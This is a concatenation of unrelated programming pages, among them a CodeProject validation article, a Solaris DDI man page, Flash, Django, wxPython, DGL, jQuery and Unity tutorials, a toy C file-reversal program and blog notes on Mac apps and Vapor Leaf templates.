Once you are done, save everything and look at your web.config, which is now modified with the validation tags. You will see both validations, i.e. customer name and customer code, in XML format inside the <validation> tag. The best part is that you can now change the validation in the config file itself. You guessed right: no recompiling, no installation, and completely decoupled.

Figure: - Web.config with validation tags

Step 15:- Now that we are done putting the validation in the web.config file, it's time to write the code which reads from the config file and applies it to our entity class. First we need to reference the validation application block in our assembly references and include the namespaces in our clsCustomer class.

Figure: - Reference validation application blocks

Figure: - Import the validation namespace

Step 16:- Once you are done adding the namespaces, it's time to fire the validation. Below is the code snippet which shows how the validation application block fires the validation using the web.config file.
In the first step we create the customer object and set the properties. In the second step we ask the Validation static class to validate the object. The Validation static class returns validation results; these are the failures reported when validation fails. In the final step we loop through the validation results to display the errors.

Figure: - The validation code

Ok, now that we are done it's time to see it in action. You can see in the UI that we have just set empty properties, and both business validation errors from the collection are displayed.

Figure: - Validation in action

The validation above only runs server side. You can read my tutorial on how to generate client-side validators using the validation engine at ApplicationBlock.aspx.

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL).

Comment: Unable to load the assembly. The error message is 'Could not load file or assembly file:///C:\Users\Admin\AppData\Local\Temp\tmp99CE.tmp' or one of its dependencies. This assembly is built by a runtime newer than the currently loaded runtime and cannot be loaded.

Comment: the setter from the article,

public string CustomerName
{
    set
    {
        if (value.Length == 0)
        {
            throw new Exception("Customer name is compulsory");
        }
        _strCustomerName = value;
    }
    get ...
}

could use string.IsNullOrEmpty instead:

if (string.IsNullOrEmpty(value))
{
    throw new Exception("Customer name is compulsory");
}
http://www.codeproject.com/Articles/29777/steps-to-write-flexible-business-validation-in?msg=2764292&PageFlow=FixedWidth
#include <sys/ddi.h>
#include <sys/sunddi.h>

int ddi_dma_addr_setup(dev_info_t *dip, struct as *as, caddr_t addr,
    size_t len, uint_t flags, int (*waitfp) (caddr_t), caddr_t arg,
    ddi_dma_lim_t *lim, ddi_dma_handle_t *handlep);

This interface is obsolete. ddi_dma_addr_bind_handle(9F) should be used instead.

dip: A pointer to the device's dev_info structure.

as: A pointer to an address space structure. Should be set to NULL, which implies kernel address space.

addr: Virtual address of the memory object.

len: Length of the memory object in bytes.

flags: Flags that would go into the ddi_dma_req structure (see ddi_dma_req(9S)).

waitfp: The address of a function to call back later if resources aren't available now. The special function addresses DDI_DMA_SLEEP and DDI_DMA_DONTWAIT (see ddi_dma_req(9S)) are taken to mean, respectively, wait until resources are available or, do not wait at all and do not schedule a callback.

arg: Argument to be passed to a callback function, if such a function is specified.

lim: A pointer to a DMA limits structure for this device (see ddi_dma_lim_sparc(9S) or ddi_dma_lim_x86(9S)). If this pointer is NULL, a default set of DMA limits is assumed.

handlep: Pointer to a DMA handle. See ddi_dma_setup(9F) for a discussion of handle.

The ddi_dma_addr_setup() function is an interface to ddi_dma_setup(9F). It uses its arguments to construct an appropriate ddi_dma_req structure and calls ddi_dma_setup(9F) with it. See ddi_dma_setup(9F) for the possible return values for this function.

The ddi_dma_addr_setup() function can be called from user, interrupt, or kernel context, except when waitfp is set to DDI_DMA_SLEEP, in which case it cannot be called from interrupt context.

See attributes(5) for a description of the following attributes:

attributes(5), ddi_dma_buf_setup(9F), ddi_dma_free(9F), ddi_dma_htoc
https://docs.oracle.com/cd/E36784_01/html/E36886/ddi-dma-addr-setup-9f.html
Limit colours in the colourPicker component

In this tutorial you will learn how to limit the number of colour swatches in a colour picker component. This means that if you only want certain colours in your component, you can set those colours. To limit the colour swatches you need to use the 'colors' property of the ColorPicker component. I have limited the colours to red, green, blue, and yellow in the example below.

Step 1

Open a new AS3 Flash file. Select Window > Components and drag the ColorPicker component into the library.

Step 2

On the timeline insert a new layer called 'Actions' and enter the following code in the actions panel. To limit the colours you will need to change the hexadecimal numbers highlighted in red below. You can find the hexadecimal numbers of the colours by clicking on either the stroke or paint bucket palette on the tool box, and then hovering over the colours.

//Import the packages needed.
import fl.events.ColorPickerEvent;
import fl.controls.ColorPicker;
import flash.geom.ColorTransform;

/*Creates a new instance of the Sprite class which fills the whole stage
area in black, and adds the display object at the bottom position (index 0).*/
var bgColour:Sprite = new Sprite();
bgColour.graphics.beginFill(0x000000);
bgColour.graphics.drawRect(0, 0, stage.stageWidth, stage.stageHeight);
addChildAt(bgColour, 0);

//Creates a new instance of the ColorPicker class.
var mycolorPicker:ColorPicker = new ColorPicker();

//Limit the colours to red, green, blue, and yellow.
mycolorPicker.colors = [0xFF0000, 0x00FF00, 0x0000FF, 0xFFFF00];

/*Moves the colour picker to (20,20), sets the size to (50,50),
and adds the component to the stage.*/
mycolorPicker.move(20, 20);
mycolorPicker.setSize(50, 50);
addChild(mycolorPicker);

//Add the change event to the colour picker.
mycolorPicker.addEventListener(ColorPickerEvent.CHANGE, changeBg);

function changeBg(event:ColorPickerEvent):void
{
    //Creates a new instance of the ColorTransform class.
    var myColorTransform:ColorTransform = bgColour.transform.colorTransform;
    //The selected colour from the colour picker.
    var theColor:Number = mycolorPicker.selectedColor;
    //Sets the new colour from the colour picker.
    myColorTransform.color = theColor;
    //Apply the colour change to the background sprite.
    bgColour.transform.colorTransform = myColorTransform;
}

Step 3

Test your movie (Ctrl + Enter). Now try clicking the colour picker and you should only see four colours in the palette. You should now be able to limit the swatches in the ColorPicker component.

1 comment:

Thanks for the toot... Helped me a great deal.
http://www.ilike2flash.com/2009/10/limit-colours-in-colourpicker-component.html
A replacement for Django's ArrayField with a multiple select form field.

Project description

A replacement for Django's ArrayField with a multiple select form field. This only makes sense if the underlying base_field is using choices.

How To Use

Replace all instances of your Django ArrayField model field with the new ArrayField. No functionality will be changed, except for the form field.

Example

from django.db import models
from array_field_select.fields import ArrayField

class Student(models.Model):
    YEAR_IN_SCHOOL_CHOICES = (
        ('FR', 'Freshman'),
        ('SO', 'Sophomore'),
        ('JR', 'Junior'),
        ('SR', 'Senior'),
    )
    years_in_school = ArrayField(
        models.CharField(max_length=2, choices=YEAR_IN_SCHOOL_CHOICES)
    )

Project details

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/django-array-field-select/
Dear all,

I have a window with several textctrls. I am trying to intercept the mouse click in each control, open a file dialog, and set the value of the specific control to the selected file. The problem is that I would like to avoid creating hundreds of similar functions, one per control, so I would like to bind one single function to all of them. What I have got so far is the following:

def onSecond(self, event):
    focus = wx.TextCtrl.FindFocus()
    if focus.GetValue() == "":
        focus.SetValue("loading...")
        dlg = wx.FileDialog(self, message="Choose the first image (base image)",
                            wildcard=filters, style=wx.MULTIPLE)
        if dlg.ShowModal() == wx.ID_OK:
            focus.SetValue(dlg.GetDirectory() + "; " + ", ".join(
                str(fl[len(dlg.GetDirectory()) + 1:]) for fl in dlg.GetPaths()))
        dlg.Destroy()

The above works if the specific textctrl is empty (focus.GetValue() == ""). What should I do if I want to pop up the file dialog regardless of the content of the specific control? If I get rid of

if focus.GetValue() == "":

I get into an endless loop. Where am I wrong and how should I proceed?

Thanks,
Gianluca
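One common pattern for this kind of question is to bind the same handler to every control and recover the control that fired the event from the event object (in wxPython, event.GetEventObject()), rather than relying on keyboard focus. Since wx may not be importable here, the sketch below imitates that dispatch in plain Python: the TextCtrl and Event classes are minimal stand-ins, not real wx classes, and in real wx code the handler body is where the wx.FileDialog would open.

```python
class TextCtrl:
    """Minimal stand-in for wx.TextCtrl."""
    def __init__(self, name):
        self.name = name
        self.value = ""
    def SetValue(self, text):
        self.value = text

class Event:
    """Minimal stand-in for a wx event: it knows which control fired it."""
    def __init__(self, source):
        self.source = source
    def GetEventObject(self):
        return self.source

def on_click(event):
    # One handler for every control: ask the event which control fired it,
    # instead of guessing from keyboard focus.
    ctrl = event.GetEventObject()
    # In the real app, open wx.FileDialog here and use its result.
    ctrl.SetValue("selected file for %s" % ctrl.name)

controls = [TextCtrl("image1"), TextCtrl("image2")]
on_click(Event(controls[1]))   # simulate a click on the second control
print(controls[1].value)       # selected file for image2
print(controls[0].value)       # '' -- untouched
```

In wxPython you would bind once per control (e.g. ctrl.Bind(wx.EVT_LEFT_DOWN, on_click) in a loop) and the single handler would serve them all.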
https://www.daniweb.com/programming/software-development/threads/489996/multiple-textctrl-with-single-function
Large-Scale Training of Graph Neural Networks

Author: Da Zheng, Chao Ma, Zheng Zhang

In real-world tasks, many graphs are very large. For example, a recent snapshot of the friendship network of Facebook contains 800 million nodes and over 100 billion links. This poses challenges for large-scale training of graph neural networks. To accelerate training on a giant graph, DGL provides two additional components: the sampler and the graph store.

- A sampler constructs small subgraphs (NodeFlow) from a given (giant) graph. The sampler can run on a local machine as well as on remote machines. DGL can also launch multiple parallel samplers across a set of machines.
- The graph store contains the graph embeddings of a giant graph, as well as the graph structure. So far, we provide a shared-memory graph store to support multi-processing training, which is important for training on multiple GPUs and on non-uniform memory access (NUMA) machines. The shared-memory graph store has a similar interface to DGLGraph for programming. DGL will also support a distributed graph store that can store graph embeddings across machines in a future release.

The figure below shows the interaction of the trainer with the samplers and the graph store. The trainer takes subgraphs (NodeFlow) from the sampler and fetches graph embeddings from the graph store before training. The trainer can push new graph embeddings to the graph store afterward.

In this tutorial, we use control-variate sampling to demonstrate how to use these three DGL components, extending the original code of control-variate sampling. Because the graph store has a similar API to DGLGraph, the code is similar; the tutorial will mainly focus on the differences.

Graph Store

The graph store has two parts: the server and the client. We need to run the graph store server as a daemon before training. We provide a script, run_store_server.py (link), that runs the graph store server and loads graph data.
For example, the following command runs a graph store server that loads the reddit dataset and is configured to run with four trainers.

python3 run_store_server.py --dataset reddit --num-workers 4

The trainer uses the graph store client to access data in the graph store from the trainer process. A user only needs to write code in the trainer. We first create the graph store client that connects with the server. We specify store_type as "shared_mem" to connect with the shared-memory graph store server.

g = dgl.contrib.graph_store.create_graph_from_store("reddit", store_type="shared_mem")

The sampling tutorial shows the details of the sampling methods and how they are used to train graph neural networks such as the graph convolution network. As a recap, the graph convolution model performs the following computation in each layer:

\(z_v^{(l+1)} = \sum_{u \in \mathcal{N}(v)} \tilde{A}_{uv} h_u^{(l)}, \qquad h_v^{(l+1)} = \sigma\big(z_v^{(l+1)} W^{(l)}\big)\)

Control-variate sampling approximates \(z_v^{(l+1)}\) as follows:

\(z_v^{(l+1)} \approx \frac{|\mathcal{N}(v)|}{|\hat{\mathcal{N}}(v)|} \sum_{u \in \hat{\mathcal{N}}(v)} \tilde{A}_{uv} \big(h_u^{(l)} - \bar{h}_u^{(l)}\big) + \sum_{u \in \mathcal{N}(v)} \tilde{A}_{uv} \bar{h}_u^{(l)}\)

where \(\hat{\mathcal{N}}(v)\) is the set of sampled neighbors of \(v\) and \(\bar{h}_u^{(l)}\) is the history of node \(u\) in layer \(l\).

In addition to the approximation, Chen et al. apply a preprocessing trick to reduce the number of hops to sample by one. This trick works for models such as graph convolution networks and GraphSAGE. It preprocesses the input layer. The original GCN takes \(X\) as input. Instead of taking \(X\) as the input of the model, the trick computes \(U^{(0)}=\tilde{A}X\) and uses \(U^{(0)}\) as the input of the first layer. In this way, the vertices in the first layer do not need to compute aggregation over their neighborhood, which reduces the number of layers to sample by one.

For a giant graph, both \(\tilde{A}\) and \(X\) can be very large, so we need to perform this operation in a distributed fashion: each trainer takes part of the computation, and the computation is distributed among all trainers. We can use update_all in the graph store to perform this computation.
g.update_all(fn.copy_src(src='features', out='m'),
             fn.sum(msg='m', out='preprocess'),
             lambda node: {'preprocess': node.data['preprocess'] * node.data['norm']})

update_all in the graph store runs in a distributed fashion. That is, all trainers need to invoke this function and take part of the computation. When a trainer completes its portion, it will wait for other trainers to complete before proceeding with its other computation.

The node/edge data now live in the graph store, and access to the node/edge data is a little different. The graph store no longer supports data access with g.ndata/g.edata, which reads the entire node/edge data tensor. Instead, users have to use g.nodes[node_ids].data[embed_name] to access data on some nodes. (Note: this method is also allowed in DGLGraph, and g.ndata is simply a short syntax for g.nodes[:].data.) In addition, the graph store supports get_n_repr/set_n_repr for node data and get_e_repr/set_e_repr for edge data.

To initialize the node/edge tensors more efficiently, we provide two new methods in the graph store client to initialize node data and edge data (i.e., init_ndata for node data and init_edata for edge data). What happens under the hood is that these two methods send initialization commands to the server, and the graph store server initializes the node/edge tensors on behalf of the trainers.

Here we show how to initialize node data for control-variate sampling. h_i stores the history of nodes in layer i; agg_h_i stores the aggregation of the history of neighbor nodes in layer i.

for i in range(n_layers):
    g.init_ndata('h_{}'.format(i), (features.shape[0], args.n_hidden), 'float32')
    g.init_ndata('agg_h_{}'.format(i), (features.shape[0], args.n_hidden), 'float32')

After we initialize the node data, we train GCN with control-variate sampling as below. The training code takes advantage of the preprocessed input data in the first layer and works identically to the single-process training procedure.
for nf in NeighborSampler(g, batch_size, num_neighbors,
                          neighbor_type='in', num_hops=L-1,
                          seed_nodes=labeled_nodes):
    for i in range(nf.num_blocks):
        # aggregate history on the original graph
        g.pull(nf.layer_parent_nid(i+1),
               fn.copy_src(src='h_{}'.format(i), out='m'),
               lambda node: {'agg_h_{}'.format(i): node.data['m'].mean(axis=1)})
    # We need to copy data in the NodeFlow to the right context.
    nf.copy_from_parent(ctx=right_context)
    nf.apply_layer(0, lambda node: {'h': layer(node.data['preprocess'])})
    h = nf.layers[0].data['h']

The complete example code can be found here.

After showing how the shared-memory graph store is used with control-variate sampling, let's see how to use it for multi-GPU training and how to optimize the training on a non-uniform memory access (NUMA) machine. A NUMA machine here means a machine with multiple processors and large memory. This works for all backend frameworks as long as the framework supports multi-processing training. If we use MXNet as the backend, we can use the distributed MXNet kvstore to aggregate gradients among processes and use the MXNet launch tool to launch multiple workers that run the training script. The command below launches our example code for multi-processing GCN training with control-variate sampling, running 4 trainers.

python3 ../incubator-mxnet/tools/launch.py -n 4 -s 1 --launcher local \
    python3 examples/mxnet/sampling/multi_process_train.py \
    --graph-name reddit \
    --model gcn_cv --num-neighbors 1 \
    --batch-size 2500 --test-batch-size 5000 \
    --n-hidden 64

It is fairly easy to enable multi-GPU training. All we need to do is copy data to the right GPU context and invoke the NodeFlow computation in that GPU context. As shown above, we specify a context right_context in copy_from_parent. To optimize the computation on a NUMA machine, we need to configure each process properly.
For example, we should use the same number of processes as the number of NUMA nodes (usually equal to the number of processors) and bind each process to a NUMA node. In addition, we should reduce the number of OpenMP threads to the number of CPU cores in one processor, and reduce the number of threads in the MXNet kvstore to a small number, such as 4.

import numa
import os

if 'DMLC_TASK_ID' in os.environ and int(os.environ['DMLC_TASK_ID']) < 4:
    # Bind the process to a NUMA node.
    numa.bind([int(os.environ['DMLC_TASK_ID'])])
    # Reduce the number of OpenMP threads to match the number of
    # CPU cores of a processor.
    os.environ['OMP_NUM_THREADS'] = '16'
else:
    # Reduce the number of OpenMP threads in the MXNet kvstore server to 4.
    os.environ['OMP_NUM_THREADS'] = '4'

Given the configuration above, NUMA-aware multi-processing training accelerates training by almost a factor of 4, as shown in the figure below, on an X1.32xlarge instance with 4 processors, each of which has 16 physical CPU cores. We can see that NUMA-unaware training cannot take advantage of the computation power of the machine; it is even slightly slower than just using one of the processors in the machine. NUMA-aware training, on the other hand, takes only about 20 seconds to converge to an accuracy of 96% within 20 iterations.

Distributed Sampler

For many tasks, we found that sampling takes a significant share of the training time on a giant graph, so DGL supports distributed samplers to speed up the sampling process. DGL allows users to launch multiple samplers on different machines concurrently, and each sampler continuously sends its sampled subgraphs (NodeFlows) to the trainer machines. To use the distributed sampler in DGL, users start both trainer and sampler processes on different machines.
Users can find the complete demo code and launch scripts in this link; this tutorial focuses on the main differences between single-machine code and distributed code. On the trainer side, developers can migrate existing single-machine sampler code to the distributed setting by changing just a few lines of code. First, users need to create a distributed SamplerReceiver object before training:

sampler = dgl.contrib.sampling.SamplerReceiver(graph, ip_addr, num_sampler)

The SamplerReceiver class is used for receiving remote subgraphs from other machines. This API has three arguments: parent_graph, ip_address, and number_of_samplers. After that, developers can change just one line of the existing single-machine training code, like this:

for nf in sampler:
    for i in range(nf.num_blocks):
        # aggregate history on the original graph
        g.pull(nf.layer_parent_nid(i+1),
               fn.copy_src(src='h_{}'.format(i), out='m'),
               lambda node: {'agg_h_{}'.format(i): node.data['m'].mean(axis=1)})
    ...

Here, the code for nf in sampler replaces the original single-machine sampling code:

for nf in NeighborSampler(g, batch_size, num_neighbors, neighbor_type='in',
                          num_hops=L-1, seed_nodes=labeled_nodes):

All the other parts of the original single-machine code are unchanged. In addition, developers need to write the sampling logic on the sampler machine. For a neighbor sampler, developers can just copy their existing single-machine code to the sampler machines, like this:

sender = dgl.contrib.sampling.SamplerSender(trainer_address)
...
for n in range(num_epoch):
    for nf in dgl.contrib.sampling.NeighborSampler(graph, batch_size, num_neighbors,
                                                   neighbor_type='in',
                                                   shuffle=shuffle,
                                                   num_workers=num_workers,
                                                   num_hops=num_hops,
                                                   add_self_loop=add_self_loop,
                                                   seed_nodes=seed_nodes):
        sender.send(nf, trainer_id)
    # tell the trainer I have finished the current epoch
    sender.signal(trainer_id)

The figure below shows the overall performance improvement of training GCN and GraphSage on the Reddit dataset after deploying the optimizations in this tutorial. Our NUMA optimization speeds up the training by a factor of 4. The distributed sampling achieves an additional 20%-40% speed improvement across different tasks.

Scale to giant graphs

Finally, we would like to demonstrate the scalability of DGL with giant synthetic graphs. We create three large power-law graphs with RMAT. Each node is associated with 100 features, and we compute node embeddings with 64 dimensions. Below we show the training speed and memory consumption of GCN with neighbor sampling. We can see that DGL can scale to graphs with up to 500M nodes and 25B edges.
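The send/signal handshake between the sampler and the trainer described above can be mimicked in a single process with a plain queue. This is purely an illustrative sketch, not the DGL API: the dict stands in for a NodeFlow, and a None item plays the role of the end-of-epoch signal.

```python
from queue import Queue

def sampler(q, num_batches):
    # Stand-in for the sampler process: push one "NodeFlow" per batch,
    # then signal that the epoch has finished.
    for batch_id in range(num_batches):
        q.put({'batch': batch_id})   # stand-in for sender.send(nf, trainer_id)
    q.put(None)                      # stand-in for sender.signal(trainer_id)

def trainer(q):
    # Stand-in for the trainer process: consume batches until the
    # end-of-epoch signal arrives.
    received = []
    while True:
        nf = q.get()
        if nf is None:               # epoch finished
            break
        received.append(nf['batch'])
    return received

q = Queue()
sampler(q, 3)
batches = trainer(q)
```

In the real distributed setting, SamplerSender and SamplerReceiver move the NodeFlows over the network between machines; the control flow on each side is the same as in this sketch.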
https://docs.dgl.ai/tutorials/models/5_giant_graph/2_giant.html
Generate a Random Number

For the last two book giveaways I did, I promised I would pick a winner totally at random from the comments. There were hundreds of comments, so I wasn't about to write the numbers on little bits of paper and pick them from a hat. I actually have a dice-rolling iPhone app I was going to use, but then I figured, what the heck, I might as well build a little webpage to do it quickly.

JavaScript Random Number

Generating a random number with JavaScript is pretty trivially easy:

var numRand = Math.floor(Math.random() * 101);

That will return a random number between 1-100. But I wanted to make this website a bit more useful, in that it will take a low and high value and return a random number between those two values.

HTML

A couple of text inputs, a "Generate!" button, and an empty div container to stick the number in will do:

<input type="text" id="lownumber" value="1" /> and <input type="text" id="highnumber" value="100" />
<br />
<input type="submit" id="getit" value="Generate!" />
<div id="randomnumber"></div>

jQuery

When the "Generate!" button is clicked, we'll do the work:

$("#getit").click(function() {
  var numLow = $("#lownumber").val();
  var numHigh = $("#highnumber").val();
  var adjustedHigh = (parseFloat(numHigh) - parseFloat(numLow)) + 1;
  var numRand = Math.floor(Math.random() * adjustedHigh) + parseFloat(numLow);
  if ((isNumeric(numLow)) && (isNumeric(numHigh)) && (parseFloat(numLow) <= parseFloat(numHigh)) && (numLow != '') && (numHigh != '')) {
    $("#randomnumber").text(numRand);
  } else {
    $("#randomnumber").text("Careful now...");
  }
  return false;
});

The easiest way I thought of was to subtract the low from the high, generate a random number between that, and then add the low back in.
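The same adjust-then-offset arithmetic can be sanity-checked in a few lines of Python (rand_between is a made-up helper name for illustration, and Python's random.random plays the part of Math.random):

```python
import random

def rand_between(low, high):
    # Subtract the low from the high, pick an integer in [0, high - low]
    # via floor(random * adjusted_high), then add the low back in.
    adjusted_high = (high - low) + 1
    return int(random.random() * adjusted_high) + low

# Every sample stays within the inclusive range.
samples = [rand_between(7, 15) for _ in range(2000)]
```

Over enough samples, both endpoints 7 and 15 show up, which confirms the range is inclusive on both ends.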
To ensure that worked, we need to check a variety of things:

- The inputs aren't blank and are numbers
- The first number is lower than the second

I used this classic IsNumeric function to check if they were actually numbers. Updated isNumeric function (10 times easier) thanks to James:

function isNumeric(n) {
  return !isNaN(n);
}

As a final touch, I wanted to have the default numbers 1 and 100 in there, but have them easy to change. So as soon as you tab to or click either element, it clears the number and changes the color to black. It also ensures that if you tab or click there AGAIN, it WON'T do that.

$("input[type=text]").each(function() {
  $(this).data("first-click", true);
});
$("input[type=text]").focus(function() {
  if ($(this).data("first-click")) {
    $(this).val("");
    $(this).data("first-click", false);
    $(this).css("color", "black");
  }
});

Pseudo-random please.

Okay, Captain Pedantic…

Thanks for the demo; nice having the code, demo and explanation on hand. One note… the demo seems to be inclusive, which is probably the intent, but the phrasing "between" usually means the min/max are excluded. I guess this can vary with one's personal definition though. Thanks for the demo.

As always Chris! thanks for this

You have a problem there :). Try (for example) to generate a random number in the range 7 – 15. There will be an error. Moreover: try entering the range 123 – 21. It will generate a number. Your problem is: you're comparing Strings. In line 31 you have (numLow <= numHigh). It should be (parseInt(numLow, 10) <= parseInt(numHigh, 10)), so that JS will compare Integers.

Good catch, thanks!

You can't even put in negative numbers

Also, we'll always have random.org…

Your 'isNumeric' function is a little over the top! JavaScript gives us the isNaN (isNotANumber) method, so why not just wrap it like this:

function isNumeric(n) { return !isNaN(n); }

forgot about isNaN.
I was gonna suggest regex :)

return !n.match(/[^\d*]/g);

regexps are much better than isNaN

Also put your isNumeric function inside your $() so it doesn't clutter the global namespace.

Thanks James, clearly that is far easier, updated!

Overkill! Nice app though. How I pick random winners for my comments is to just select a random email and name from the comments table where post equals the post id, using RAND() and LIMIT to pull one person at random with SQL.

Pseudo Random will be true laughs. But I have a question: the goal of the script is to generate an integer, isn't it? So why use parseFloat and not parseInt(userInput, 10) (don't forget the base)? Because if we use the script you made, and we put (for instance) 2.5 for the lower number and 2.75 for the higher, and then generate a couple of times to get a random integer, you will see 3.5 sometimes, which is not an integer, and is out of range ;) Sorry for my english ;)

I get an error in ff 3.0.7

It's not leaving a number for me. When I submit it just goes back to defaults.

Same here

My bad, was messing with it fixing something else, it's good now.

Do you really need to load the entire jQuery library? From what I can see it's only being used for something that can be done with standard DOM JS. I created something like this months ago and I used about 10 lines of plain javascript…. jQuery is very cool, but in cases like this I think it is overkill. Anyway, thanks for sharing your knowledge! ;)

Nice of you for bringing the code, but we want something not random. I'm kidding.

Chris, what font is that?

hi, this demo is great, and so useful too :) thank you Chris :D But I want to ask a question: how can I make it work on the first click only? I mean, make it get a random number from the first click only? I'm so grateful for this great job… keep it up… and good luck.

So, did I win the book?

The range would be from 0 – 100 with the code: var numRand = Math.floor(Math.random()*101). Math.random generates: 0 <= N < 1
https://css-tricks.com/generate-a-random-number/
Returns true if the Mesh is read/write enabled, or false if it is not.

When a Mesh is read/write enabled, Unity uploads the Mesh data to GPU-addressable memory, but also keeps it in CPU-addressable memory. When a Mesh is not read/write enabled, Unity uploads the Mesh data to GPU-addressable memory, and then removes it from CPU-addressable memory.

You can set this value using the Read/Write Enabled checkbox when importing a model to Unity. To set the value to false at run time, set the markNoLongerReadable argument of Mesh.UploadMeshData.

In most cases, you should disable this option to save runtime memory usage. You should only enable it under the following circumstances:

- When you read from or write to the Mesh data in your code.
- When you pass the Mesh to StaticBatchingUtility.Combine() to combine the Mesh at run time.
- When you pass the Mesh to CanvasRenderer.SetMesh.
- When you use the Mesh to bake a NavMesh using the NavMesh building components at run time.
- When the Mesh is convex, you use the Mesh with a Mesh Collider, and the Mesh Collider's Transform has negative scaling (for example, (–1, 1, 1)).
- When you use the Mesh with a Mesh Collider, and the Mesh Collider's transform is skewed or sheared (for example, when a rotated Transform has a scaled parent Transform).
- When you use the Mesh with a Mesh Collider, and the Mesh Collider's Cooking Options flags are set to any value other than the default.
- When you use the Mesh with a Particle System's Shape module or Renderer module and are not using GPU instancing. Note that the Particle System will automatically change Meshes to readable when assigned through the Inspector.

Notes: When Unity creates a Mesh from script, this value is initially set to true. Meshes not marked readable will throw an error on accessing any data arrays from script at runtime. Access is always allowed in the Unity Editor outside of the game and rendering loop, regardless of this setting.

See Also: StaticBatchingUtility.Combine.
using UnityEngine;
using System.Collections;

public class ExampleClass : MonoBehaviour
{
    void Start()
    {
        Mesh mesh = GetComponent<MeshFilter>().sharedMesh;
        print(mesh.isReadable);
    }
}
https://docs.unity3d.com/ru/2020.2/ScriptReference/Mesh-isReadable.html
//**************************************
// INCLUDE files for: Better, Simpler, Flip-Flop "encryption"
//**************************************
#include <stdio.h>

//**************************************
// Name: Better, Simpler, Flip-Flop "encryption"
// Description: It reads the binary of a file, and outputs it in reverse so the
// new "encrypted" file can't be normally read. To decrypt, encode the new file
// and it will be reversed again, restoring it back to normal. It's pretty handy,
// and simple. Please rate this code.
// By: Miah! (from psc cd)
//**************************************

/*
   Backwerdz version 1.00 by Miah.
   It takes a file, reads it from back to front, and outputs it to a new
   backwards file that can't be read normally. Simple enough... On with the code!
*/

int main()
{
    char fileIn[30], fileOut[30];
    char byteBuff[1];
    long x = -1, Fsize;

    printf("\t\t\tMiah's Backwerdz file encoder\n");
    printf("\n\nEnter Filename to Encode/Decode: ");
    scanf("%29s", fileIn);
    printf("\nEnter name to output file as: ");
    scanf("%29s", fileOut);

    FILE *in, *out;
    in = fopen(fileIn, "rb");   // Need that "b" so it can read binary too!
    out = fopen(fileOut, "wb"); // And write it...

    fseek(in, 0, SEEK_END);
    Fsize = ftell(in); // This fTells us the size of the file by going to the end
                       // and reading what the number of the last byte is

    do {
        fseek(in, x, SEEK_END);      // Seek a negative offset from the end so we read backwards
        fread(&byteBuff, 1, 1, in);  // read and write at the same time
        fwrite(&byteBuff, 1, 1, out);
        x--;                         // Continue to count down
        Fsize--;                     // Decrease the size count so we can
    } while (Fsize > 0);             // break the loop when it reaches zero

    fclose(in); // Close it!
    fclose(out);
    return 0;
}
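Since reversing a byte stream is its own inverse, "encoding" a file twice restores the original. A hypothetical Python sketch of the same transformation, operating on an in-memory byte string instead of files:

```python
def flip(data: bytes) -> bytes:
    # Read the data back to front, like the C loop that seeks backwards
    # from SEEK_END one byte at a time.
    return data[::-1]

original = b"Backwerdz version 1.00 by Miah."
encoded = flip(original)   # unreadable backwards copy
restored = flip(encoded)   # flip again to decode
```

This also makes the program's limitation obvious: byte reversal hides the content from casual reading, but it is not encryption in any cryptographic sense.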
http://planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=2345&lngWId=3
2019-01-18

These are some apps from Bitfield, which I share my office space with. Jörgen has some helpful tools and utilities I can highly recommend. I use them for sharing moving screenshots with fellow programmers and customers. Cropping and generating an optimized palette for making smaller GIFs are great.

GIF'ted - Turn your movies into animated GIF's

A video player that, unlike VLC, is easy to use. Since it's based on FFMPEG, it opens almost everything.

Playr - Video playback simplified

Why aren't Americans using week numbers? It's so convenient to refer to a week number instead of a range of dates. Friends and families always like to get a little congrats on their big day! They are much appreciated with a simple reminder.

For PHP projects, PhpStorm is the king of the hill. Everything is built in without being big bloat.

PhpStorm: The Lightning-Smart IDE for PHP Programming by JetBrains

Great kit that works as an alternative to Adobe Photoshop and Illustrator. You can understand how to do macros! No monthly subscriptions, and it works great for my needs.

Affinity - Professional creative software

My favorite todo app. Read my review of todo apps.

Things. Your to-do list for Mac & iOS

2017-10-15

Version 2 of F-Bar is here. Make sure to check for updates. This is a free upgrade for every existing customer.

Finally, support for Hyper! Hyper lacks support for AppleScript, but it's possible to launch it via accessibility controls. Answer yes, and let F-Bar take control. The next time, it will launch Hyper!

Add a cURL request last in your deployment script and get a push notification when everything is done. Read more here.

Added keyboard shortcuts for a faster workflow.

If you are running Spaces (multiple virtual desktops), it's sometimes easy to lose track of where your dialog is hiding. With the dock icon enabled, you can use TAB to select it again.

The project is completely updated to Swift 4.
Removal of Forge Accounts works.

2017-07-24

FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%postmeta';

:-) WordPress easy security list: WordPress Security – 19+ Steps to Lock Down Your Site

2017-07-21

Next up we are going to add some views. Unfortunately, Xcode does not render Leaf templates correctly. You could manually set the type to HTML, but this will revert every time you build. Instead, I went back to good old Sublime for editing templates. First install Leaf - Packages - Package Control.

Open Resources/Views/base.leaf and add Bootstrap 4 in the header. We cannot hurt our eyes with unstyled content :-)

As you can see, Leaf works very similarly to Laravel and Blade. Create Resources/Views/index.leaf and add a simple index page:

#extend("base")

#export("title") { Stations }

#export("content") {
  <table class="table">
    <tr>
      <th>ID</th>
      <th>Name</th>
      <th>Country</th>
      <th>Stream</th>
    </tr>
    #loop(stations, "station") {
      <tr>
        <td><a href="/station/#(station.id)">#(station.id)</a></td>
        <td>#(station.name)</td>
        <td>#(station.country)</td>
        <td>#(station.stream)</td>
      </tr>
    }
  </table>
  <a href="/create" class="btn btn-default">Add a station</a>
}

Instead of section, Leaf uses export as markup.
Create Resources/Views/edit.leaf for creating records:

#extend("base")

#export("title") { Stations }

#export("content") {
  <form class="form" action="/station/#(station.id)" method="post">
    <div class="form-group">
      <label for="name">Name</label>
      <input class="form-control" type="text" name="name" value="#(station.name)">
    </div>
    <div class="form-group">
      <label for="description">Description</label>
      <textarea class="form-control" name="description" id="description" cols="30" rows="10">#(station.description)</textarea>
    </div>
    <div class="form-group">
      <label for="country">Country</label>
      <input class="form-control" type="text" name="country" value="#(station.country)">
    </div>
    <div class="form-group">
      <label for="stream">Stream URL</label>
      <input class="form-control" type="text" name="stream" value="#(station.stream)">
    </div>
    <button type="submit" class="btn btn-primary">Save</button>
    <a href="/" class="btn btn-default">Back</a>
  </form>
}

